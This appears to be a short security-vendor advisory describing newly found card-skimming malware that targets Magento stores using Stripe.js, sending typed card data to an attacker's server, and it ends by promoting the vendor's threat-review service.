The Foregenix DFIR team has discovered what is believed to be a unreported piece of malware which has recently been used to target insecure eCommerce websites processing through Stripe, running on the Magento framework.
Although the malware is not unique in its functionality it does mean users could have their credit card data stolen even before they have pressed the checkout button. Rather than harvesting code to a local harvest file for later retrieval by the attacker, it immediately posts the data using a JQuery AJAX function to an external server controlled by the attacker as soon as values have been entered into an input field.
What does make the malware distinct is the fact that it is directly targeting the Stripe.js code for Magento.
This attack is only possible when a website is insecure - just to be clear, while this attack focuses on the Stripe.js integration for Magento, it can only take place when the website itself has been hacked. Preventing this attack therefore requires a website administrator/web developer to keep the website secure. Here's an article we recently wrote on Securing Your Magento Website.
In order to detect this malware on your website, you'll need an internal scan of your environment that looks for key indicators of compromise.
You can detect these by using a free Guided Threat Review from the Foregenix team.